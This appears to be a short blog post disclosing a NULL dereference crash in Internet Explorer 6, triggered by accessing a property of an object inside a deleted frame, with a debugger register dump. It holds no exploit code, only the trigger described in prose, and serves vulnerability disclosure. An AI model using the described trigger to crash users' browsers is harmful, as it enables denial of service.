The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was discovered by Aviv Raff while working on a new browser fuzzing tool. It is possible to trigger a NULL dereference by accessing the property of an object that is inside a deleted frame.
Please see the demo source code for an example.
Demonstration
eax=00000000 ebx=01ba7180 ecx=00000000
edx=7dc95b90 esi=00000000 edi=00000000
eip=7dc9d8ba esp=0013dc98 ebp=0013dccc
mshtml!CMarkup::EnsureTopElems+0xc:
7dc9d8ba 8b7744 mov esi,dword ptr [edi+44h] ds:0023:00000044=????????
This bug will be added to the OSVDB:
Microsoft IE Orphan Object Property Access NULL Dereference
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment